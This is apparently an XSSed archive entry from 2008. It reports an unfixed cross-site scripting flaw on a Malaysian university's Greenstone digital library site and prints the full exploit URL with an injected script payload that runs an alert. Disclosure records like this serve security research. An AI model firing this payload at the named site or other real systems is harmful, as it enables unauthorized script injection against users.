Unfixed XSS vulnerability at mymanuskrip.fsktm.um.edu.my

2008-12-25T00:00:00
ID XSSED:55886
Type xssed
Reporter Xylitol
Modified 2009-03-01T00:00:00

Description

Security researcher Xylitol, has submitted on 25/12/2008 a cross-site-scripting (XSS) vulnerability affecting mymanuskrip.fsktm.um.edu.my, which at the time of submission ranked 26769 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/01/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://mymanuskrip.fsktm.um.edu.my/Greenstone/cgi-bin/library.exe?e=status-00000-00---off-0--00---0-10-0---0---0prompt-10---4-------0-1l--10-en-50---20-welcome---0--1-00-0-0-01-1-0utfZz-8-00&a=status&p=collectioninfo&pr=nullproto&c=test}%3C/style%3E%3Cscript%3Ea=eval;b=alert;a(b(/XSS/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3Ehhhhh%3C/h1%3E%3C/marquee%3E